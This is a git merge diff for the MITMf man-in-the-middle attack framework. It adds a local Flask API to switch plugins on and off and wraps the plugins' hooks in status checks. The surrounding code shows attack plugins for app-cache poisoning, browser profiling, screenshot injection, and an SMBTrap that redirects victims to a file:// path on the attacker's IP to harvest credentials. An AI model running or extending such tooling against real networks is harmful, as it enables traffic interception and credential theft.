Merge https://www.github.com/xtr4nge/MITMf into api

mitmf.py

@@ -18,6 +18,12 @@
 # USA
 #
 
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import argparse
 import sys
 import os
@@ -31,6 +37,15 @@ from core.sergioproxy.ProxyPlugins import ProxyPlugins
 from core.utils import Banners, SystemConfig, shutdown
 from plugins import *
 
+# @xtr4nge
+import multiprocessing, time, signal
+from flask import Flask
+from configobj import ConfigObj
+import json
+
+# @xtr4nge
+pluginStatus = ConfigObj("config/plugins.conf")
+
 Banners().printBanner()
 
 if os.geteuid() != 0:
@@ -128,6 +143,10 @@ for p in plugins:
     #load only the plugins that have been called at the command line
     if vars(args)[p.optname] is True:
 
+        # @xtr4nge
+        pluginStatus['plugins'][p.optname]['status'] = "enabled"
+        pluginStatus.write()
+
         print "|_ {} v{}".format(p.name, p.version)
         if p.tree_info:
             for line in xrange(0, len(p.tree_info)):
@@ -187,8 +206,77 @@ from core.servers.smb.SMBserver import SMBserver
 print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver)
 SMBserver.getInstance().start()
 
+'''
 #start the reactor
 reactor.run()
 
 print "\n"
 shutdown()
+'''
+
+# ------------------------------------
+# @xtr4nge [enabled | disabled]
+# ------------------------------------
+app = Flask(__name__)
+
+@app.route("/getPlugins")
+def getPlugins():
+    # Lists all the plugins supporting [enabled|disabled] (check: config/plugins.conf)
+    # example: http://127.0.0.1:9090/getPlugins
+    pluginList = {"cachekill", "screen", "browserprofiler", "appoison", "replace", "smbtrap", "upsidedownternet"}
+    
+    data = {}
+    for item in pluginList:
+        data[item] = [pluginStatus['plugins'][item]['status']]
+    
+    return json.dumps(data)
+    
+@app.route("/getPluginStatus/<plugin>")
+def getPluginStatus(plugin):
+    # example: http://127.0.0.1:9090/getPluginStatus/cachekill
+    return pluginStatus['plugins'][plugin]['status']
+
+@app.route("/setPluginStatus/<plugin>/<status>")
+def setPluginStatus(plugin, status):
+    # example: http://127.0.0.1:9090/setPluginStatus/cachekill/1 # enabled
+    # example: http://127.0.0.1:9090/setPluginStatus/cachekill/0 # disabled
+    if status == "1":
+        pluginStatus['plugins'][plugin]['status'] = "enabled"
+        pluginStatus.write()
+    elif status == "0":
+        pluginStatus['plugins'][plugin]['status'] = "disabled"
+        pluginStatus.write()
+    
+    return getPluginStatus(plugin)
+
+# @xtr4nge
+def startFlask():
+    app.run(host='127.0.0.1', port=9090)
+
+# @xtr4nge
+def startCore():
+    #start the reactor
+    reactor.run()
+
+# @xtr4nge
+try:
+    pool = {}
+    pool[0] = multiprocessing.Process(name="core", target=startCore)
+    pool[1] = multiprocessing.Process(name="api", target=startFlask)
+    pool[0].start()
+    pool[1].start()
+
+    while True:
+        pass
+
+except KeyboardInterrupt:
+    shutdown()
+    pool[0].terminate()
+    pool[1].terminate()
+except Exception as e:
+    print e
+    shutdown()
+    pool[0].terminate()
+    pool[1].terminate()
+finally:
+    print "bye ;)" 

plugins/AppCachePoison.py

@@ -18,6 +18,12 @@
 # USA
 #
 
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import logging
 import re 
 import os.path
@@ -28,6 +34,8 @@ from datetime import date
 from plugins.plugin import Plugin
 from core.sslstrip.URLMonitor import URLMonitor
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class AppCachePlugin(Plugin):
@@ -37,6 +45,14 @@ class AppCachePlugin(Plugin):
     version    = "0.3"
     has_opts   = False
 
+    # @xtr4nge
+    def getStatus(self):
+        self.pluginStatus = ConfigObj("config/plugins.conf")
+        if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+            return True
+        else:
+            return False
+
     def initialize(self, options):
         self.options = options
         self.mass_poisoned_browsers = []
@@ -45,7 +61,7 @@ class AppCachePlugin(Plugin):
         self.urlMonitor.setAppCachePoisoning()
 
     def serverResponse(self, response, request, data):
-
+        if self.getStatus():
             #This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
     
             self.app_config = self.config['AppCachePoison'] # so we reload the config on each request

plugins/BrowserProfiler.py

@@ -17,12 +17,21 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 #
+
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import logging
 
 from pprint import pformat
 from plugins.plugin import Plugin
 from plugins.Inject import Inject
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class BrowserProfiler(Inject, Plugin):
@@ -32,6 +41,14 @@ class BrowserProfiler(Inject, Plugin):
     version    = "0.3"
     has_opts   = False
 
+    # @xtr4nge
+    def getStatus(self):
+        self.pluginStatus = ConfigObj("config/plugins.conf")
+        if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+            return True
+        else:
+            return False
+
     def initialize(self, options):
         self.output = {}  # so other plugins can access the results
 
@@ -46,6 +63,7 @@ class BrowserProfiler(Inject, Plugin):
         return d
 
     def clientRequest(self, request):
+        if self.getStatus():
             #Handle the plugin output
             if 'clientprfl' in request.uri:
                 request.printPostData = False 

plugins/CacheKill.py

@@ -18,9 +18,17 @@
 # USA
 #
 
+"""
+
+[API] enabled|disabled by @xtr4nge
+
+"""
+
 import logging
 from plugins.plugin import Plugin
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class CacheKill(Plugin):
@@ -29,16 +37,26 @@ class CacheKill(Plugin):
     desc        = "Kills page caching by modifying headers"
     version     = "0.1"
 
+    # @xtr4nge
+    def getStatus(self):
+        self.pluginStatus = ConfigObj("config/plugins.conf")
+        if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+            return True
+        else:
+            return False
+
     def initialize(self, options):
         self.bad_headers = ['if-none-match', 'if-modified-since']
 
     def serverHeaders(self, response, request):
         '''Handles all response headers'''
+        if self.getStatus():
             response.headers['Expires'] = "0"
             response.headers['Cache-Control'] = "no-cache"
 
     def clientRequest(self, request):
         '''Handles outgoing request'''
+        if self.getStatus():
             request.headers['pragma'] = 'no-cache'
             for header in self.bad_headers:
                 if header in request.headers:

plugins/JsKeylogger.py

@@ -17,6 +17,7 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 #
+
 import logging
 import re
 import random

plugins/Replace.py

@@ -21,6 +21,7 @@
 """
 
 Plugin by @rubenthijssen
+[enabled | disabled] by @xtr4nge
 
 """
 
@@ -32,6 +33,8 @@ from plugins.plugin import Plugin
 from plugins.CacheKill import CacheKill
 from core.sergioproxy.ProxyPlugins import ProxyPlugins
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class Replace(Plugin):
@@ -41,6 +44,14 @@ class Replace(Plugin):
 	version    = "0.2"
 	has_opts   = False
 
+	# @xtr4nge
+	def getStatus(self):
+		self.pluginStatus = ConfigObj("config/plugins.conf")
+		if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+			return True
+		else:
+			return False
+
 	def initialize(self, options):
 		self.options = options
 
@@ -49,6 +60,7 @@ class Replace(Plugin):
 		self.mime = "text/html"
 
 	def serverResponse(self, response, request, data):
+		if self.getStatus():
 			ip, hn, mime = self._get_req_info(response)
 	
 			if self._should_replace(ip, hn, mime):

plugins/SMBTrap.py

@@ -1,9 +1,17 @@
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import logging
 import random
 import string
 from plugins.plugin import Plugin
 from core.utils import SystemConfig
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class SMBTrap(Plugin):
@@ -13,12 +21,22 @@ class SMBTrap(Plugin):
 	version = "1.0"
 	has_opts = False
 
+	# @xtr4nge
+	def getStatus(self):
+		self.pluginStatus = ConfigObj("config/plugins.conf")
+		if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+			return True
+		else:
+			return False
+
 	def initialize(self, options):
 		self.ourip = SystemConfig.getIP(options.interface)
 
 	def serverResponseStatus(self, request, version, code, message):
+		if self.getStatus():
 			return {"request": request, "version": version, "code": 302, "message": "Found"}
 
 	def serverHeaders(self, response, request):
+		if self.getStatus():
 			mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host']))
 			response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))

plugins/Screenshotter.py

@@ -18,6 +18,12 @@
 # USA
 #
 
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import logging
 import base64
 import urllib
@@ -27,6 +33,8 @@ from datetime import datetime
 from plugins.Inject import Inject
 from plugins.plugin import Plugin
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger('mitmf')
 
 class ScreenShotter(Inject, Plugin):
@@ -36,12 +44,21 @@ class ScreenShotter(Inject, Plugin):
 	ver      = '0.1'
 	has_opts = True
 
+	# @xtr4nge
+	def getStatus(self):
+		self.pluginStatus = ConfigObj("config/plugins.conf")
+		if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+			return True
+		else:
+			return False
+
 	def initialize(self, options):
 		self.interval = 10 or options.interval
 		Inject.initialize(self, options)
 		self.html_payload = self.get_payload()
 
 	def clientRequest(self, request):
+		if self.getStatus():
 			if 'saveshot' in request.uri:
 				request.printPostData = False
 				client = request.client.getClientIP()

plugins/Upsidedownternet.py

@@ -18,11 +18,19 @@
 # USA
 #
 
+"""
+
+[enabled | disabled] by @xtr4nge
+
+"""
+
 import logging
 from cStringIO import StringIO
 from plugins.plugin import Plugin
 from PIL import Image, ImageFile
 
+from configobj import ConfigObj
+
 mitmf_logger = logging.getLogger("mitmf")
 
 class Upsidedownternet(Plugin):
@@ -32,6 +40,14 @@ class Upsidedownternet(Plugin):
     version    = "0.1"
     has_opts   = False
 
+    # @xtr4nge
+    def getStatus(self):
+        self.pluginStatus = ConfigObj("config/plugins.conf")
+        if self.pluginStatus['plugins'][self.optname]['status'] == "enabled":
+            return True
+        else:
+            return False
+
     def initialize(self, options):
         globals()['Image'] = Image
         globals()['ImageFile'] = ImageFile
@@ -39,12 +55,14 @@ class Upsidedownternet(Plugin):
 
     def serverHeaders(self, response, request):
         '''Kill the image skipping that's in place for speed reasons'''
+        if self.getStatus():
             if request.isImageRequest:
                 request.isImageRequest = False
                 request.isImage = True
                 self.imageType = response.headers['content-type'].split('/')[1].upper()
 
     def serverResponse(self, response, request, data):
+        if self.getStatus():
             try:
                 isImage = getattr(request, 'isImage')
             except AttributeError:

requirements.txt

@@ -15,3 +15,4 @@ pyopenssl
 service_identity
 capstone
 pypcap
+flask